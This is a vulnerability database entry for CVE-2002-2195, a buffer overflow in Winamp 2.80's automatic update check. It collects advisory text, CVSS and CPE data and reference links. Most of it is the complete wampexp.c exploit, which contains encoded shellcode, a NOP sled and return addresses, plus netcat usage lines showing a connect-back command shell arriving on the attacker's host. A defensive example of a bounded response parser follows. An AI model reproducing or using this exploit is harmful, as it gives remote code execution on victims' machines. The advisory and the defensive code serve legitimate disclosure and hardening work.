CVE-2002-2195
CVSS 5.0
Published: 2002-12-31 00:00:00
Revised: 2008-09-05 16:32:34

[Original] Buffer overflow in the version update check for Winamp 2.80 and earlier allows remote attackers who can spoof www.winamp.com to execute arbitrary code via a long server response.


[CNNVD] Nullsoft Winamp Automatic Update Check Buffer Overflow Vulnerability (CNNVD-200212-580)

Winamp 2.80 and earlier versions contain a buffer overflow vulnerability in the automatic version update check. A remote attacker who spoofs www.winamp.com can execute arbitrary code by means of an over-long server response.

- CVSS (base score)

CVSS score: 5 [Medium (MEDIUM)]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:nullsoft:winamp:2.61::full
cpe:/a:nullsoft:winamp:2.62::standard
cpe:/a:nullsoft:winamp:2.80
cpe:/a:nullsoft:winamp:2.78
cpe:/a:nullsoft:winamp:2.73
cpe:/a:nullsoft:winamp:2.70::full
cpe:/a:nullsoft:winamp:2.74
cpe:/a:nullsoft:winamp:2.79
cpe:/a:nullsoft:winamp:2.75
cpe:/a:nullsoft:winamp:2.64::standard
cpe:/a:nullsoft:winamp:2.65
cpe:/a:nullsoft:winamp:2.72
cpe:/a:nullsoft:winamp:2.73::full
cpe:/a:nullsoft:winamp:2.60::lite
cpe:/a:nullsoft:winamp:2.71
cpe:/a:nullsoft:winamp:2.76
cpe:/a:nullsoft:winamp:2.70

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2195
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2195
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-580
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5170
(PATCH)  BID  5170
http://www.iss.net/security_center/static/9488.php
(UNKNOWN)  XF  winamp-auto-update-bo(9488)

- Vulnerability information

Nullsoft Winamp Automatic Update Check Buffer Overflow Vulnerability
Medium severity  Buffer overflow
2002-12-31 00:00:00 2006-03-17 00:00:00
Remote
Winamp 2.80 and earlier versions contain a buffer overflow vulnerability in the automatic version update check. A remote attacker who spoofs www.winamp.com can execute arbitrary code by means of an over-long server response.

- Advisories and patches

        2c79cbe14ac7d0b8472d3f129fa1df has contributed an unofficial patch which is reported to hardcode the Winamp update site to the static IP address 205.188.245.120. The patch is available as an attachment to the referenced BugTraq post.
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (21595)

Nullsoft Winamp 2.80 Automatic Update Check Buffer Overflow Vulnerability (EDBID:21595)
windows remote
2002-07-03 Verified
0 Anonymous
N/A
source: http://www.securityfocus.com/bid/5170/info

Nullsoft Winamp is a media player for Microsoft Windows supporting MP3 and other filetypes.

Winamp is vulnerable to a buffer overflow condition when checking for updated versions. A malicious server located at www.winamp.com may return a malicious response. Exploitation may result in the execution of arbitrary code as the Winamp process.

It may be possible to exploit this vulnerability if an attacker can control the resolution of the www.winamp.com domain, possibly through DNS cache poisoning. 

/*
    wampexp.c
    July 3rd, 2002

    Winamp 2.80a and all previous remote exploit (connect-back styles)

    winamp has an option, enabled by default, which checks for the latest
    version from www.winamp.com and will then notify the user of a possible
    upgrade via a messagebox..

    unfortunately, if it were to receive a huge response via some nameserver
    corruption the thread parsing the response is thrown into an infinite
    loop and eventually the exception dispatcher is called.. and THEN like
    most of the time under windows a big, bad, overflow occurs..

    ex: # (./wampexp 192.168.0.1 5555)|nc -l -p 80
        # nc -l -p 5555
        *poisoned user opens winamp*
        # nc -l -p 5555
        Microsoft Windows 2000 [Version 5.00.2195]
        (C) Copyright 1985-2000 Microsoft Corp.

        C:\>

    sincerely, 2c79cbe14ac7d0b8472d3f129fa1df55
    (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)

    yes, yahoo took away my 2! ;~~~
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>

// a minimal HTTP header and fake version
unsigned char payload[35904] =
"\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a";

// a gruesome hack of dark spyrits jill.c shell that further alters the
// startupinfo structure (as this isn't a service) and calls ExitThread
// to keep things invisible..

unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";

int main(int argc, char **argv){
    int i;
    unsigned short int      a_port;
    unsigned long           a_host;
    struct hostent          *ht;
    struct sockaddr_in      sin;

    if (argc < 3){
        printf("Winamp 2.80a remote exploit (7/3/2002)\n");
        printf("c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com\n\n");
        printf("usage: %s <localhost> <localport>\n\n", argv[0]);
        printf("NOTE: target os is 2000.. probably works on all\n");
        printf("winamp versions prior to 2.80a as there are no \n");
        printf("dependancies on winamp, only the static ws2help\n\n");
        exit(-1);
    }

    // blatantly ripped! *TEEHEEEHHEH*
    a_port  = htons(atoi(argv[2]));
    a_port ^= 0x9595;
    if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);}
    a_host  = *((unsigned long *)ht->h_addr);
    a_host ^= 0x95959595;
    shell[385] = ((a_port) & 0xff);
    shell[386] = ((a_port >> 8) & 0xff);
    shell[390] = ((a_host) & 0xff);
    shell[391] = ((a_host >> 8) & 0xff);
    shell[392] = ((a_host >> 16) & 0xff);
    shell[393] = ((a_host >> 24) & 0xff);

    strcat(payload, shell);

    // lots of NOPs
    for(i=792;i<9704;i++)
        strcat(payload, "\x90");

    // we land here when we jmp ebx the second time
    // this sets ebx to the start of our shell, and jmps back
    strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37");
    strcat(payload, "\x11\x01\xff\xe3");

    // lots more NOPs for lots more fun
    for(i=9718;i<35809;i++)
        strcat(payload, "\x90");

    // and bh, dl; jmp ebx.. this allows us to jmp back into an area
    // where we can put some real code
    strcat(payload, "\x22\xfa\xff\xe3");

    // our "eip" (call ecx; ntdll.dll@0x11936)
    // jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service packs)
    strcat(payload, "\xd6\x19\x02\x75");

    // if ws2help doesn't match for some reason, use this call ebx..
    // dependant on the winamp in_wm.dll plugin
    //strcat(payload, "\x57\x22\x12\x01");

    strcat(payload, "\x0d\x0a");

    printf("%s", payload);
    return 0;
}
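The defect the exploit above relies on is an updater that copies a server response of arbitrary length. The following is an added example, not code from the advisory, from wampexp.c or from Winamp, of how the receiving side is written so that an over-long reply from a spoofed www.winamp.com is rejected rather than parsed: the response is read under a hard byte cap, the version string is copied only after every byte has been checked, and the parser re-checks the length itself so it stays safe even if called from another reader. The wire format `OK\r\n\r\n<version>\r\n\r\n` is taken from the fake reply the exploit sends; the caps, the result codes, the `classify` helper and the in-memory byte source that stands in for a socket are assumptions of this example.

```c
/* Added example, not from the advisory, wampexp.c or Winamp: a bounded reader and parser
 * for the version-check reply. The wire format "OK\r\n\r\n<version>\r\n\r\n" is taken from
 * the exploit's fake reply; caps, result codes and the in-memory byte source are assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_RESPONSE_BYTES 512  /* assumed cap: far above any legitimate reply */
#define MAX_VERSION_LEN    15   /* assumed cap: "999.999.999" fits easily */

enum vcheck_result {
    VCHECK_OK = 0,
    VCHECK_TOO_LARGE,   /* peer sent more than the cap: fail closed, never parse */
    VCHECK_BAD_HEADER,  /* reply did not start with "OK\r\n\r\n" */
    VCHECK_BAD_VERSION  /* version missing, over-long, not [0-9.], or unterminated */
};

/* Parse resp[0..len) into out (written only on success). Reads are checked against len,
 * writes against a fixed local cap, so an over-long reply can only be rejected. */
enum vcheck_result parse_version_response(const unsigned char *resp, size_t len,
                                          char *out, size_t outlen)
{
    static const char hdr[] = "OK\r\n\r\n";
    const size_t hdrlen = sizeof hdr - 1;
    char ver[MAX_VERSION_LEN + 1];
    size_t i, n = 0;
    if (len > MAX_RESPONSE_BYTES) return VCHECK_TOO_LARGE;
    if (len < hdrlen || memcmp(resp, hdr, hdrlen) != 0) return VCHECK_BAD_HEADER;
    for (i = hdrlen; i < len && resp[i] != '\r'; i++) {
        if ((resp[i] < '0' || resp[i] > '9') && resp[i] != '.') return VCHECK_BAD_VERSION;
        if (n == MAX_VERSION_LEN) return VCHECK_BAD_VERSION;  /* reject, never truncate */
        ver[n++] = (char)resp[i];
    }
    if (n == 0 || n + 1 > outlen) return VCHECK_BAD_VERSION;
    if (len - i < 4 || memcmp(resp + i, "\r\n\r\n", 4) != 0) return VCHECK_BAD_VERSION;
    memcpy(out, ver, n); out[n] = '\0';
    return VCHECK_OK;
}

/* Byte source so the read loop runs offline; a real one wraps recv(). 0 = end of stream. */
typedef size_t (*read_fn)(void *ctx, unsigned char *buf, size_t n);
/* Read at most cap bytes; returns cap + 1 if the peer still had more, which is hostile, not a reply. */
size_t bounded_read(read_fn rd, void *ctx, unsigned char *buf, size_t cap)
{
    size_t total = 0;
    unsigned char probe;
    while (total < cap) {
        size_t got = rd(ctx, buf + total, cap - total);
        if (got == 0) return total;                    /* clean end of stream */
        total += got;
    }
    return rd(ctx, &probe, 1) == 0 ? total : cap + 1;  /* buffer full: was there more? */
}

/* Constructed in-memory peer that hands out `chunk` bytes per read, like a slow sender. */
struct mem_src { const unsigned char *data; size_t len, pos, chunk; };
static size_t mem_read(void *ctx, unsigned char *buf, size_t n)
{
    struct mem_src *m = ctx;
    size_t left = m->len - m->pos;
    if (n > m->chunk) n = m->chunk;
    if (n > left) n = left;
    memcpy(buf, m->data + m->pos, n);
    m->pos += n;
    return n;
}

/* One full check over a wire buffer: bounded read, then bounded parse. */
enum vcheck_result check_update(const unsigned char *wire, size_t wirelen, size_t chunk,
                                char *out, size_t outlen)
{
    unsigned char buf[MAX_RESPONSE_BYTES];
    struct mem_src src = { wire, wirelen, 0, chunk };
    size_t got;
    if (outlen) out[0] = '\0';                         /* out is meaningful only on VCHECK_OK */
    got = bounded_read(mem_read, &src, buf, sizeof buf);
    if (got > sizeof buf) return VCHECK_TOO_LARGE;
    return parse_version_response(buf, got, out, outlen);
}

char last_ver[MAX_VERSION_LEN + 1];  /* version from the most recent accepted reply */

/* Classify a constructed reply: `prefix`, then 0x90 filler (like the exploit's NOP sled) up to
 * `total` bytes (0 = prefix only), delivered `chunk` bytes per read. Returns the result code. */
int classify(const char *prefix, size_t total, size_t chunk)
{
    size_t plen = strlen(prefix);
    unsigned char *wire;
    int r = -1;
    if (total == 0) total = plen;
    if ((wire = malloc(total)) != NULL && total >= plen) {
        memcpy(wire, prefix, plen);
        memset(wire + plen, 0x90, total - plen);
        r = check_update(wire, total, chunk, last_ver, sizeof last_ver);
    }
    free(wire);
    return r;
}
```

`classify("OK\r\n\r\n9.99\r\n\r\n", 0, 4)` returns `VCHECK_OK` and leaves `9.99` in `last_ver`; `classify("OK\r\n\r\n", 35904, 1460)` (a reply the size of the exploit's `payload` buffer) returns `VCHECK_TOO_LARGE` without any of the filler reaching the parser, and the same holds when the peer trickles one byte per read. The cap is enforced in two places on purpose: `bounded_read` stops pulling bytes and reports overflow when the peer still has data, and `parse_version_response` checks `len` again so a caller that bypasses the reader still cannot overrun it. Bounding the parser closes the overflow only; the advisory's precondition is a spoofed www.winamp.com, so the other half of the fix is authenticating the update source (a TLS connection with certificate validation, or a signed version manifest) rather than the unofficial patch's hardcoded IP address.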


- Vulnerability information

60114
Winamp Version Update Check MiTM Server Response Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

- Timeline

2002-07-05 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete